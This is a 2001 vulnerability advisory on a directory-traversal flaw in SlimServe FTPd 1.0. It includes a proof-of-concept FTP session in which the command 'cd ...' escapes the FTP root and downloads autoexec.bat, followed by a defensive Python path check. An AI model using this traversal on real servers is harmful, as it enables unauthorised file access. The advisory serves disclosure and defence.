Reported March 1, 2001, by Ken Pfeil.

VERSIONS AFFECTED

  • SlimServe FTPd 1.0

DESCRIPTION

A vulnerability exists that lets an attacker break out of the FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command "cd ...", an attacker can access the root directory where the FTP server is running.

DEMONSTRATION

Joe Testa also provided the following proof-of-concept scenario:

C:\> ftp hostname
Connected to vulnerablehost.somewhere.com.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to vulnerablehost.somewhere.com.
User (vulnerablehost.somewhere.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp> bye
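
The path check whose absence the session above exposes, sketched as an added example (not SlimServe's code and not part of the original advisory). The names resolve_virtual, to_real, reply_for and PathRejected and the root C:\ftproot are assumptions made for illustration; the resolver works on the virtual path only and refuses any dot-only component other than "." and "..".

```python
import ntpath


class PathRejected(Exception):
    """The client-supplied path must be refused (reply 550)."""


def resolve_virtual(cwd, arg):
    """Resolve a CWD/RETR argument against the session's virtual directory."""
    arg = arg.replace("\\", "/")            # Windows accepts both separators
    if "\x00" in arg or ":" in arg:          # NUL byte, drive letter, stream
        raise PathRejected("illegal character")
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if stack:
                stack.pop()                  # clamp at the virtual root
            continue
        if part.strip(". ") == "":           # "...", "....", ". ." and so on
            raise PathRejected("dot-only component %r" % part)
        stack.append(part)
    return "/" + "/".join(stack)


def to_real(ftp_root, vpath):
    """Map a resolved virtual path under ftp_root and re-check containment."""
    root = ntpath.normpath(ftp_root)
    real = ntpath.normpath(ntpath.join(root, *vpath.strip("/").split("/")))
    prefix = root.rstrip("\\") + "\\"
    if real != root and not real.lower().startswith(prefix.lower()):
        raise PathRejected("outside FTP root")
    return real


def reply_for(cwd, arg, ftp_root="C:\\ftproot"):   # constructed root path
    """Return the reply a server using the checks above would send."""
    try:
        return "250 " + to_real(ftp_root, resolve_virtual(cwd, arg))
    except PathRejected as exc:
        return "550 " + str(exc)


if __name__ == "__main__":
    for arg in ("...", "/.../autoexec.bat", "pub/../pub/readme.txt"):
        print(repr(arg), "->", reply_for("/", arg))
```

Note that ntpath.normpath leaves a "..." component untouched, so the prefix comparison in to_real would not catch it on its own; the refusal has to happen in resolve_virtual before the path reaches the filesystem.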

VENDOR RESPONSE

The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.

CREDIT

Discovered by Joe Testa.